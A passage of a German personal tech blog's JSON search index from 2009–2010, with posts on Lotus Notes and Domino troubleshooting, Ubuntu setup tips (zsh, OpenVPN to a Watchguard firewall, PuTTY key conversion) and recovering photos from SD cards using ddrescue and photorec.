finden. Sehr schade!\u003c/p\u003e\n\u003cp\u003e[…]\n\u003cem\u003e_\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003cp\u003eThe intent of the Domino Directory Independence (DI) capability was to\nenable Notes and Domino to store person and group information\nexclusively in an LDAP Directory. This was a significant initiative\nundertaken by the Domino Development team, specifically, DI had the goal\nof easing the burden for administrators who deploy and manage multiple\ndirectories. We have made the business decision to leverage DI in IBM’s\nhosted offerings, but there are no plans to provide this Directory\nIndependence capability in Domino.\u003c/p\u003e","ref":"https://stoeps.de/posts/2010/2010-01-07-domino-directory-independence/","title":"Directory Independence wird nicht fortgeführt"},{"body":"Gregg Eldred schrieb gestern in seinem Blog eine interessante Ausführung zu Deny Access Lists und wie man eventuell trotzdem noch Mails versenden kann, obwohl man dort bereits eingetragen ist.\nSnTT: When Deny Lists Don’t Work ","excerpt":"\u003cp\u003eGregg Eldred schrieb gestern in seinem Blog eine interessante Ausführung\nzu Deny Access Lists und wie man eventuell trotzdem noch Mails versenden\nkann, obwohl man dort bereits eingetragen ist.\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eSnTT: When Deny Lists Don’t Work\u003c/li\u003e\n\u003c/ul\u003e","ref":"https://stoeps.de/posts/2009/2009-12-31-interessantes-zu-deny-access-lists/","title":"Interessantes zu Deny Access Lists"},{"body":"Auf der Seite http://www.lts-prien.de habe ich das Plugin Larsens Calender eingebaut, da mir die Funktion sehr praktisch vorkam.\nDa ich in meinem Webspace mehrere WordPress Instanzen installiert habe, die mit unterschiedlichen Tabellen Prefixes die gleiche MySQL Datenbank verwenden, fiel mir schnell auf, daß der Kalender dieses Prefix nicht ausliest, sondern immer die Tabelle wp_larsenscalender schreibt, bzw. liest.\nIch habe die vorhandenen Sourcen so geändert, daß der Prefix verwendet wird und ausserdem ein Beschreibungsfeld hinzugefügt, das in den Sourcen fast fertig programmiert war, aber in den Formularen nicht auftauchte.\nDie Änderungen habe ich an Lars gemailt und ich hoffe er wird das in seine Version übernehmen, damit das in WordPress direkt installiert werden kann. Bis dahin findet ihr hier das geänderte Plugin:\nlarsen1.3.1\nZur Installation die Zipdatei in euer WordPress-Verzeichnis /wp-content/plugins entpacken.\nUpdate: Die Version 1.3 hatte noch kleinere Probleme beim Ändern von Einträgen und Löschen, das ist jetzt behoben. Ausserdem habe ich den Link in eine Extra-Spalte gepackt.\n","excerpt":"\u003cp\u003eAuf der Seite \u003ca href=\"http://www.lts-prien.de\" target=\"_blank\"\u003ehttp://www.lts-prien.de \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n habe ich das Plugin\n\u003ca href=\"http://wordpress.org/extend/plugins/larsens-calender/\" target=\"_blank\"\u003eLarsens Calender \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\neingebaut, da mir die Funktion sehr praktisch vorkam.\u003c/p\u003e\n\u003cp\u003eDa ich in meinem Webspace mehrere WordPress Instanzen installiert habe,\ndie mit unterschiedlichen Tabellen Prefixes die gleiche MySQL Datenbank\nverwenden, fiel mir schnell auf, daß der Kalender dieses Prefix nicht\nausliest, sondern immer die Tabelle wp_larsenscalender schreibt, bzw.\nliest.\u003c/p\u003e\n\u003cp\u003eIch habe die vorhandenen Sourcen so geändert, daß der Prefix verwendet\nwird und ausserdem ein Beschreibungsfeld hinzugefügt, das in den Sourcen\nfast fertig programmiert war, aber in den Formularen nicht auftauchte.\u003c/p\u003e\n\u003cp\u003eDie Änderungen habe ich an Lars gemailt und ich hoffe er wird das in\nseine Version übernehmen, damit das in WordPress direkt installiert\nwerden kann. Bis dahin findet ihr hier das geänderte Plugin:\u003c/p\u003e","ref":"https://stoeps.de/posts/2009/2009-12-23-plugin-larsens-calender/","title":"Plugin Larsens Calender"},{"body":"Nach einem Update von 7.0.3 auf Domino 8.5.1 hatte ich diese Woche den Fall, daß der Http-Task nicht mehr starten wollte. Die Fehlermeldung war:\n\u0026lt;br /\u0026gt; \u0026quot;HTTP Server: Error - Unable to Bind , port 80, port may be in use\u0026quot;\nMein erster Gedanke war natürlich, daß eventuell eine andere Software den Port in Benutzung (Test mit netstat -an) hat, aber da lag ich leider falsch.\nBei Gregg Eldred fand ich dann einen Hinweis:\nDomino 8 tests for and returns an error for a misconfiguration of the Server document. Domino 7 did not test for this condition.\nIf the “Host name(s)” field in the Server document \u0026gt; Internet Protocols \u0026gt; HTTP tab contains both an IP Address and server name when “bind to host name” is enabled, then an error occurs because you do not need to specify both an IP and server name in that field. Only one value is required.\nIn diesem Fall war keine Mischung aus FQDN und IP eingetragen, sondern der FQDN und zwei DNS Aliase. Alle drei Einträge waren auf die gleiche IP auflösbar. Diese Einträge genügten, um den Http-Task nicht starten zu lassen.\n","excerpt":"\u003cp\u003eNach einem Update von 7.0.3 auf Domino 8.5.1 hatte ich diese Woche den\nFall, daß der Http-Task nicht mehr starten wollte. Die Fehlermeldung\nwar:\u003c/p\u003e\n\u003cp\u003e\u003ccode\u003e\u0026lt;br /\u0026gt; \u0026quot;HTTP Server: Error - Unable to Bind , port 80, port may be in use\u0026quot;\u003c/code\u003e\u003c/p\u003e\n\u003cp\u003eMein erster Gedanke war natürlich, daß eventuell eine andere Software\nden Port in Benutzung (Test mit \u003ccode\u003enetstat -an\u003c/code\u003e) hat, aber da lag ich\nleider falsch.\u003c/p\u003e\n\u003cp\u003eBei Gregg Eldred fand ich dann einen Hinweis:\u003c/p\u003e\n\u003cblockquote\u003e\n\u003cp\u003eDomino 8 tests for and returns an error for a misconfiguration of the\nServer document. Domino 7 did not test for this condition.\u003c/p\u003e\n\u003cp\u003eIf the “Host name(s)” field in the Server document \u0026gt; Internet Protocols\n\u0026gt; HTTP tab contains both an IP Address and server name when “bind to\nhost name” is enabled, then an error occurs because you do not need to\nspecify both an IP and server name in that field. Only one value is\nrequired.\u003c/p\u003e","ref":"https://stoeps.de/posts/2009/2009-12-21-domino-8-5-1-http-cannot-bind-to-port-80/","title":"Domino 8.5.1 – http cannot bind to port 80"},{"body":"Nachdem gestern die ersten Versuche einer MySQL Migration von 4.1 zu 5.0 nicht funktioniert hatten, habe ich beim Rückspielen des Backups Probleme mit den Sonderzeichen bekommen.\nIch habe daher meine Seite neu aufgebaut und lösche die alte Installation. An sich sollten die Texte komplett importiert worden sein, es fehlen aber noch ein paar Plugins.\n","excerpt":"\u003cp\u003eNachdem gestern die ersten Versuche einer MySQL Migration von 4.1 zu 5.0\nnicht funktioniert hatten, habe ich beim Rückspielen des Backups\nProbleme mit den Sonderzeichen bekommen.\u003c/p\u003e\n\u003cp\u003eIch habe daher meine Seite neu aufgebaut und lösche die alte\nInstallation. An sich sollten die Texte komplett importiert worden sein,\nes fehlen aber noch ein paar Plugins.\u003c/p\u003e","ref":"https://stoeps.de/posts/2009/2009-12-20-neues-layout-migration/","title":"Neues Layout – Migration"},{"body":"Vor 20 Jahren wurde Lotus Notes 1.0 released.\nThe History of Notes and Domino Ed Brill: 20 years ago today…Notes 1.0 ","excerpt":"\u003cp\u003eVor 20 Jahren wurde Lotus Notes 1.0 released.\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"http://www.ibm.com/developerworks/lotus/library/ls-NDHistory/\" target=\"_blank\"\u003eThe\nHistory of Notes and Domino \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"http://www.edbrill.com/ebrill/edbrill.nsf/dx/20-years-ago-today%e2%80%a6%e2%80%8bnotes-1.0?opendocument\u0026amp;comments\" target=\"_blank\"\u003eEd\nBrill: 20 years ago today…Notes 1.0 \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e","ref":"https://stoeps.de/posts/2009/2009-12-07-happy-birthday-lotus-notes/","title":"Happy Birthday Lotus Notes"},{"body":" Slide aus einer Präsentation von Cecil Clijoux:\n[Interessanter Slide bzw. Beitrag bei Lotus Germany\n]2 Da kann man eigentlich nichts mehr hinzufügen. Ich verstehe den Hype um Sharepoint überhaupt nicht. Ich gebe ja zu, daß z.B. Lotus Connections eher aufwändig zu installieren ist, aber dafür habe ich dann eine coole Web 2.0 Anwendung, die auch für mehrere tausend User gut skaliert.\n","excerpt":"\u003cblockquote\u003e\n\u003cp\u003eSlide aus einer\n\u003ca href=\"http://tkrischak.posterous.com/enterprise-20-fostering-knowledge-management\" target=\"_blank\"\u003ePräsentation \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\nvon Cecil Clijoux:\u003c/p\u003e\u003c/blockquote\u003e\n\u003cp\u003e[Interessanter Slide bzw. Beitrag bei Lotus Germany\u003c/p\u003e\n\u003cp\u003e]\u003ca href=\"http://connections.euluc.com/blogs/lotusgermany/entry/enterprise_2_0_why_can_t_we_just_use_sharepoint?lang=de\" target=\"_blank\"\u003e2 \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e\n\u003cp\u003eDa kann man eigentlich nichts mehr hinzufügen. Ich verstehe den Hype um\nSharepoint überhaupt nicht. Ich gebe ja zu, daß z.B. Lotus Connections\neher aufwändig zu installieren ist, aber dafür habe ich dann eine coole\nWeb 2.0 Anwendung, die auch für mehrere tausend User gut skaliert.\u003c/p\u003e","ref":"https://stoeps.de/posts/2009/2009-12-06-lotus-germany-why-cant-we-just-use-sharepoint/","title":"Lotus Germany: Why can’t we just use Sharepoint"},{"body":"Nachdem die z-Shell einige nette Features bringt, die Bash noch nicht, bzw. nicht unterstützt, installiere ich die z-Shell für meinen Ubuntu-Benutzer als Default.\nsudo apt-get install zsh\nEine gute Grundlage ist die zshrc von GRML .\n\u0026lt;br /\u0026gt; # IMPORTANT: please note that you might override an existing\u0026lt;br /\u0026gt; # configuration file in the current working directory! ⇒\u0026lt;br /\u0026gt; wget -O .zshrc http://git.grml.org/f/grml-etc-core/etc/zsh/zshrc\u0026lt;br /\u0026gt;\nDanach kann man mit zsh testen, ob der Befehl richtig ausgeführt wird. Als Abschluß setze ich die z-Shell als Default-Shell:\nchsh -s /usr/bin/zsh username\nWeiterführende Links zur z-Shell: grml.org – Zsh zsh.org Zsh-Liebhaberseite ","excerpt":"\u003cp\u003eNachdem die z-Shell einige nette Features bringt, die Bash noch nicht,\nbzw. nicht unterstützt, installiere ich die z-Shell für meinen\nUbuntu-Benutzer als Default.\u003c/p\u003e\n\u003cp\u003e\u003ccode\u003esudo apt-get install zsh\u003c/code\u003e\u003c/p\u003e\n\u003cp\u003eEine gute Grundlage ist die zshrc von \u003ca href=\"http://grml.org/zsh\" target=\"_blank\"\u003eGRML \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n.\u003c/p\u003e\n\u003cp\u003e\u003ccode\u003e\u0026lt;br /\u0026gt; # IMPORTANT: please note that you might override an existing\u0026lt;br /\u0026gt; # configuration file in the current working directory! ⇒\u0026lt;br /\u0026gt; wget -O .zshrc http://git.grml.org/f/grml-etc-core/etc/zsh/zshrc\u0026lt;br /\u0026gt;\u003c/code\u003e\u003c/p\u003e\n\u003cp\u003eDanach kann man mit zsh testen, ob der Befehl richtig ausgeführt wird.\nAls Abschluß setze ich die z-Shell als Default-Shell:\u003c/p\u003e\n\u003cp\u003e\u003ccode\u003echsh -s /usr/bin/zsh username\u003c/code\u003e\u003c/p\u003e\n\u003ch1 id=\"weiterführende-links-zur-z-shell\"\u003eWeiterführende Links zur z-Shell: \u003ca href=\"#weiterf%c3%bchrende-links-zur-z-shell\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h1\u003e\n\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"http://grml.org/zsh\" target=\"_blank\"\u003egrml.org – Zsh \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"http://zsh.org\" target=\"_blank\"\u003ezsh.org \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e","ref":"https://stoeps.de/posts/2009/2009-10-19-ubuntu-9-10-bash-durch-zsh-ersetzen/","title":"Ubuntu 9.10: bash durch zsh ersetzen"},{"body":"Hatte grad das Problem, daß Notes 8.5.1 unter Ubuntu 9.10 Teile des Fensters falsch anzeigt. Hier die Lösung!\n[…]Wer ein Update auf die – bald stabile – Ubuntu Version macht und mit Lotus Notes 8.5 darauf arbeitet, wird sich nach dem ersten Neustart wundern. Notes sieht komisch aus :-)\nDie grafische Oberfläche von Notes ist teilweise nicht sichtbar, Fensterinhalte sind komplett leer … Die Lösung ? Eigentlich ganz einfach. Es müssen nur ein paar libs ausgetauscht werden.[…] [den ganzen Artikel und die Libs auf Linux AHA]1 Danke schön für die Libs! Die funktionieren auch mit Lotus Notes 8.5.1\n","excerpt":"\u003cp\u003eHatte grad das Problem, daß Notes 8.5.1 unter Ubuntu 9.10 Teile des\nFensters falsch anzeigt. Hier die Lösung!\u003c/p\u003e\n\u003cblockquote\u003e\n\u003cp\u003e[…]Wer ein Update auf die – bald stabile – Ubuntu Version macht und mit\nLotus Notes 8.5 darauf arbeitet, wird sich nach dem ersten Neustart\nwundern. Notes sieht komisch aus :-)\u003c/p\u003e\u003c/blockquote\u003e\n\u003cblockquote\u003e\n\u003cp\u003eDie grafische Oberfläche von Notes ist teilweise nicht sichtbar,\nFensterinhalte sind komplett leer … Die Lösung ? Eigentlich ganz\neinfach. Es müssen nur ein paar libs ausgetauscht werden.[…] [den ganzen\nArtikel und die Libs auf Linux\nAHA]\u003ca href=\"http://linux-aha.de/wordpress/?p=231\" target=\"_blank\"\u003e1 \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e\u003c/blockquote\u003e\n\u003cp\u003eDanke schön für die Libs! Die funktionieren auch mit Lotus Notes 8.5.1\u003c/p\u003e","ref":"https://stoeps.de/posts/2009/2009-10-16-lotus-notes-8-5-1-auf-ubuntu-9-10-karmic/","title":"Lotus Notes 8.5.1 auf Ubuntu 9.10 (Karmic)"},{"body":"Laut dem Dominoblog wird DAOS in der Version 8.5.1 eine Funktion enthalten, die auch die Netzwerklast minimiert.\nIn\nDomino 8.5.1, DAOS is now enhanced so that it can EXTEND its optimization\nbetween clients and servers, and among servers!! This is intra-server\ncopying!\nDomino Blog: DAOS Updates for Domino 8.5.1 Das heißt Dateianhänge werden zwischen den Dominoservern auch nur noch einmal ausgetauscht und sparen damit effektiv Netzwerkbandbreite.\nWenn das ähnlich gut funktioniert wie DAOS bisher, ist das wirklich ein cooles Feature.\n","excerpt":"\u003cp\u003eLaut dem Dominoblog wird DAOS in der Version 8.5.1 eine Funktion\nenthalten, die auch die Netzwerklast minimiert.\u003c/p\u003e\n\u003cp\u003e\u003cem\u003eIn\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003cp\u003eDomino 8.5.1, DAOS is now enhanced so that it can EXTEND its\noptimization\u003c/p\u003e\u003c/blockquote\u003e\n\u003cblockquote\u003e\n\u003cp\u003ebetween clients and servers, and among servers!!  This is intra-server\u003c/p\u003e\u003c/blockquote\u003e\n\u003cblockquote\u003e\n\u003cp\u003ecopying!\u003c/p\u003e\u003c/blockquote\u003e\n\u003cp\u003e\u003ca href=\"http://www.dominoblog.com/dominoblog/dblog.nsf/dx/daos-updates-for-domino-8.5.1\" target=\"_blank\"\u003eDomino\nBlog: DAOS Updates for Domino 8.5.1 \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e\n\u003cp\u003eDas heißt Dateianhänge werden zwischen den Dominoservern auch nur noch\neinmal ausgetauscht und sparen damit effektiv Netzwerkbandbreite.\u003c/p\u003e\n\u003cp\u003eWenn das ähnlich gut funktioniert wie DAOS bisher, ist das wirklich ein\ncooles Feature.\u003c/p\u003e","ref":"https://stoeps.de/posts/2009/2009-09-23-neues-daos-feature-in-8-5-1/","title":"Neues DAOS Feature in 8.5.1"},{"body":"Ubuntu 9.04 habe ich als Grundsystem inklusive SSH-Server installiert.\nFolgende Pakete sollten zusätzlich installiert werden:\n\u0026lt;br /\u0026gt; sudo aptitude install libstdc++5 libxmu6 libxp6 libxp-java libxtst6 build-essential\u0026lt;br /\u0026gt;\nUnter Ubuntu ist /bin/sh mit dash verlinkt, damit erhält man beim Ausführen des Installers eine Fehlermeldung. Daher sollte man /bin/sh mit /bin/bash verlinken:\n\u0026lt;br /\u0026gt; rm /bin/sh\u0026lt;br /\u0026gt; ln -s /bin/bash /bin/sh\u0026lt;br /\u0026gt;\nDanach läuft das Installationsprogramm wie gewohnt durch, es erscheint aber eine Fehlermeldung, dass das System nicht supported wird.\nAuf manchen Systemen war es notwendig mit sudo su in den root-Account zu wechseln und erst dann den Installer mit ./install aufzurufen.\n","excerpt":"\u003cp\u003eUbuntu 9.04 habe ich als Grundsystem inklusive SSH-Server installiert.\u003c/p\u003e\n\u003cp\u003eFolgende Pakete sollten zusätzlich installiert werden:\u003c/p\u003e\n\u003cp\u003e\u003ccode\u003e\u0026lt;br /\u0026gt; sudo aptitude install libstdc++5 libxmu6 libxp6 libxp-java libxtst6 build-essential\u0026lt;br /\u0026gt;\u003c/code\u003e\u003c/p\u003e\n\u003cp\u003eUnter Ubuntu ist /bin/sh mit dash verlinkt, damit erhält man beim\nAusführen des Installers eine Fehlermeldung. Daher sollte man /bin/sh\nmit /bin/bash verlinken:\u003c/p\u003e\n\u003cp\u003e\u003ccode\u003e\u0026lt;br /\u0026gt; rm /bin/sh\u0026lt;br /\u0026gt; ln -s /bin/bash /bin/sh\u0026lt;br /\u0026gt;\u003c/code\u003e\u003c/p\u003e\n\u003cp\u003eDanach läuft das Installationsprogramm wie gewohnt durch, es erscheint\naber eine Fehlermeldung, dass das System nicht supported wird.\u003c/p\u003e\n\u003cp\u003eAuf manchen Systemen war es notwendig mit \u003ccode\u003esudo su\u003c/code\u003e in den root-Account\nzu wechseln und erst dann den Installer mit \u003ccode\u003e./install\u003c/code\u003e aufzurufen.\u003c/p\u003e","ref":"https://stoeps.de/posts/2009/2009-08-13-domino-8-5-installation-auf-ubuntu-9-04-server/","title":"Domino 8.5 Installation auf Ubuntu 9.04 Server"},{"body":"Nach meinem kompletten Umstieg auf Linux fand ich u.a. noch eine ppk-Datei die ich ssh-Verbindungen benutze.\nDa ich unter Ubuntu nicht mehr mit putty arbeiten wollte, suchte ich nach einer Möglichkeit, diesen Key in einen RSA-Key umzuwandeln.\napt-get install puttygen\nputtygen key.ppk -o id_rsa.pub -O public-openssh\nputtygen key.ppk -o id_rsa -O private-openssh\nWeitere Infos in der puttygen Manpage ","excerpt":"\u003cp\u003eNach meinem kompletten Umstieg auf Linux fand ich u.a. noch eine\nppk-Datei die ich ssh-Verbindungen benutze.\u003c/p\u003e\n\u003cp\u003eDa ich unter Ubuntu nicht mehr mit putty arbeiten wollte, suchte ich\nnach einer Möglichkeit, diesen Key in einen RSA-Key umzuwandeln.\u003c/p\u003e\n\u003cp\u003e\u003ccode\u003eapt-get install puttygen\u003c/code\u003e\u003c/p\u003e\n\u003cp\u003e\u003ccode\u003eputtygen key.ppk -o id_rsa.pub -O public-openssh\u003c/code\u003e\u003c/p\u003e\n\u003cp\u003e\u003ccode\u003eputtygen key.ppk -o id_rsa -O private-openssh\u003c/code\u003e\u003c/p\u003e\n\u003cp\u003eWeitere Infos in der\n\u003ca href=\"http://manpages.ubuntu.com/manpages/intrepid/man1/puttygen.1.html\" target=\"_blank\"\u003eputtygen\nManpage \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e","ref":"https://stoeps.de/posts/2009/2009-07-29-putty-keyfile-ppk-in-rsa-key-umwandeln/","title":"Putty-Keyfile (\\*.ppk) in rsa-key umwandeln"},{"body":"Endlich hab ich es geschafft. Mit kräftiger Hilfe von einigen Twitternutzern, ist es mir gelungen mit Openvpn eine VPN-Verbindung zu unserer Watchguard aufzubauen.\nAls erstes sollte man sich die Datei client.wgssl von der jeweiligen Firebox besorgen. Diese Datei kann man am Einfachsten direkt von der Firewall herunterladen:\nhttps://gateway:4100/?action=sslvpn_download\u0026amp;filename=client.wgssl\u0026amp;usern\u0026lt;br /\u0026gt; ame=my_name\u0026amp;password=my_password\nDie Datei umbenennen in client.wgssl.tgz und schon kann man sie mit\ntar -xvzf client.wgssl.tgz entpacken. Man sollte folgende Dateien erhalten:\nca.crt\nclient.crt\nclient.pem\nclient.ovpn\nVERSION\nMD5SUM\nIch habe diese Files nach /etc/openvpn verschoben, da es mir erst nicht gelungen ist, als User die VPN Verbindung aufzubauen. Um die DNS-Einstellungen vom VPN zu erhalten, muß man die Datei client.ovpn anpassen. Ich habe folgende Einträge hinzugefügt:\nscript-security 2\u0026lt;br /\u0026gt; up /etc/openvpn/update-resolv-conf\u0026lt;br /\u0026gt; down /etc/openvpn/update-resolv-conf\nAußerdem sollte man das Paket resolvconf nachinstallieren.\nsudo apt-get install resolvconf\nDen Tunnel baut man dann mit:\ncd /etc/openvpn\u0026lt;br /\u0026gt; sudo openvpn ./client.ovpn\nauf.\nProblematisch ist noch das Beenden des Tunnels, da mit Strg-C zwar der Tunnel weg ist, aber die alten DNS-Einstellungen nicht zurückgestellt werden.\nNetworkmanager sudo apt-get install network-manager-openvpn\nDie Einstellungen kann man z.B. aus dem client.ovpn importieren. Manche Einstellungen sollte man dann noch etwas anpassen. Bei mir funktionierte die Verbindung erst richtig, als ich die Option “Use this connection only for resources on its network” (unter Routes) aktiviert hatte.\n","excerpt":"\u003cp\u003eEndlich hab ich es geschafft. Mit kräftiger Hilfe von einigen\nTwitternutzern, ist es mir gelungen mit Openvpn eine VPN-Verbindung zu\nunserer Watchguard aufzubauen.\u003c/p\u003e\n\u003cp\u003eAls erstes sollte man sich die Datei client.wgssl von der jeweiligen\nFirebox besorgen. Diese Datei kann man am Einfachsten direkt von der\nFirewall herunterladen:\u003c/p\u003e\n\u003cp\u003e\u003ccode\u003ehttps://gateway:4100/?action=sslvpn_download\u0026amp;filename=client.wgssl\u0026amp;usern\u0026lt;br /\u0026gt; ame=my_name\u0026amp;password=my_password\u003c/code\u003e\u003c/p\u003e\n\u003cp\u003eDie Datei umbenennen in client.wgssl.tgz und schon kann man sie mit\u003cbr\u003e\n\u003ccode\u003etar -xvzf client.wgssl.tgz\u003c/code\u003e entpacken. Man sollte folgende Dateien\nerhalten:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eca.crt\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eclient.crt\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eclient.pem\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eclient.ovpn\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eVERSION\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eMD5SUM\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eIch habe diese Files nach /etc/openvpn verschoben, da es mir erst nicht\ngelungen ist, als User die VPN Verbindung aufzubauen. Um die\nDNS-Einstellungen vom VPN zu erhalten, muß man die Datei client.ovpn\nanpassen. Ich habe folgende Einträge hinzugefügt:\u003c/p\u003e","ref":"https://stoeps.de/posts/2009/2009-07-08-ssl-vpn-von-ubuntu-zu-watchguard-firebox/","title":"SSL VPN von Ubuntu zu Watchguard Firebox"},{"body":"Aus aktuellem Anlass eine kurze Anleitung zum Retten von Fotos von SD Karten, die unter Windows nicht mehr erkannt werden (Platte muß formatiert werden usw.).\nNotwendige Pakete installieren sudo apt-get install testdisk ddrescue\nPartition identifizieren Beim Einstecken der Karte in das Lesegerät, kommt im Log normalerweise der Eintrag, welches Device erstellt wurde.\nÖffnet ein Terminalfenster und startet mit tail -f /var/log/messages die Ausgabe des Logs.\nIch gehe jetzt mal von /dev/sr aus.\nsudo fdisk -l /dev/sr zeigt uns, welche Partitionen auf der Karte vorhanden sind.\nImage erstellen Um nicht evtl. Daten auf der Karte zu zerstören, arbeiten wir mit einen Image. ddrescue /dev/sr1 /home/\u0026lt;user\u0026gt;/disk.img\nFotos extrahieren mkdir /home/\u0026lt;user\u0026gt;/foto_rescue\nphotorec /d /home/\u0026lt;user\u0026gt;/foto_rescue /home/\u0026lt;user\u0026gt;/disk.img\nFotos die das Programm retten konnte landen damit in /home//foto_rescue\nDa bleibt mir nur noch eines: VIEL GLÜCK!!!\n","excerpt":"\u003cp\u003eAus aktuellem Anlass eine kurze Anleitung zum Retten von Fotos von SD\nKarten, die unter Windows nicht mehr erkannt werden (Platte muß\nformatiert werden usw.).\u003c/p\u003e\n\u003ch1 id=\"notwendige-pakete-installieren\"\u003eNotwendige Pakete installieren \u003ca href=\"#notwendige-pakete-installieren\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h1\u003e\n\n\u003cp\u003e\u003ccode\u003esudo apt-get install testdisk ddrescue\u003c/code\u003e\u003c/p\u003e\n\u003ch1 id=\"partition-identifizieren\"\u003ePartition identifizieren \u003ca href=\"#partition-identifizieren\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h1\u003e\n\n\u003cp\u003eBeim Einstecken der Karte in das Lesegerät, kommt im Log normalerweise\nder Eintrag, welches Device erstellt wurde.\u003c/p\u003e\n\u003cp\u003eÖffnet ein Terminalfenster und startet mit \u003ccode\u003etail -f /var/log/messages\u003c/code\u003e\ndie Ausgabe des Logs.\u003c/p\u003e\n\u003cp\u003eIch gehe jetzt mal von /dev/sr aus.\u003c/p\u003e\n\u003cp\u003e\u003ccode\u003esudo fdisk -l /dev/sr\u003c/code\u003e zeigt uns, welche Partitionen auf der Karte\nvorhanden sind.\u003c/p\u003e\n\u003ch1 id=\"image-erstellen\"\u003eImage erstellen \u003ca href=\"#image-erstellen\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h1\u003e\n\n\u003cp\u003eUm nicht evtl. Daten auf der Karte zu zerstören, arbeiten wir mit einen\nImage. \u003ccode\u003eddrescue /dev/sr1 /home/\u0026lt;user\u0026gt;/disk.img\u003c/code\u003e\u003c/p\u003e","ref":"https://stoeps.de/posts/2009/2009-07-04-fotos-von-sd-karte-retten-mit-ubuntu/","title":"Fotos von SD Karte retten (mit Ubuntu)"},{"body":"Im Moment hab ich wieder ziemlich viel um die Ohren und nutze nur ein wenig meinen Twitter-Account , um Neues von mir zu verbreiten.\nMeine nächsten Termine sind am 14. Juli 09 ein Vortrag im KuKO in Rosenheim über Nagios und Monitoring. Vortrag wird im Rahmen einer NetIT Region Veranstaltung stattfinden.\nAußerdem halte ich am AdminCamp 2009 einen weiteren Vortrag zu Nagios und Monitoring von Lotus Domino.\nIch hoffe ich komme die nächsten Tage mal dazu, die Installation von http://www.icinga.orgIcinga zu testen. Das Demo auf der Homepage verspricht so Einiges. Ich bin gespannt, ob die Entwickler des Fork, wie versprochen Nagioskompatibel bleibt.\nAnsonsten installiere ich grade mit Otto einen Websphere Application Server mit Portal auf SLES 10. Wenn die Installation beendet ist, dann würde ich gerne das Nagiosplugin nagios-was testen.\n","excerpt":"\u003cp\u003eIm Moment hab ich wieder ziemlich viel um die Ohren und nutze nur ein\nwenig meinen \u003ca href=\"http://twitter.com/stoeps/\" target=\"_blank\"\u003eTwitter-Account \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n, um Neues von\nmir zu verbreiten.\u003c/p\u003e\n\u003cp\u003eMeine nächsten Termine sind am 14. Juli 09 ein Vortrag im\n\u003ca href=\"http://www.kuko.de\" target=\"_blank\"\u003eKuKO \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n in Rosenheim über \u003ca href=\"http://www.nagios.org\" target=\"_blank\"\u003eNagios \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\nund Monitoring. Vortrag wird im Rahmen einer\n\u003ca href=\"http://www.netit-region.eu\" target=\"_blank\"\u003eNetIT Region \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n Veranstaltung stattfinden.\u003c/p\u003e\n\u003cp\u003eAußerdem halte ich am \u003ca href=\"http://www.Admincamp.de\" target=\"_blank\"\u003eAdminCamp 2009 \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n einen\nweiteren Vortrag zu Nagios und Monitoring von Lotus Domino.\u003c/p\u003e\n\u003cp\u003eIch hoffe ich komme die nächsten Tage mal dazu, die Installation von\n\u003ca href=\"http://www.icinga.orgIcinga\" target=\"_blank\"\u003ehttp://www.icinga.orgIcinga \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n zu testen. Das Demo auf der Homepage\nverspricht so Einiges. Ich bin gespannt, ob die Entwickler des Fork, wie\nversprochen Nagioskompatibel 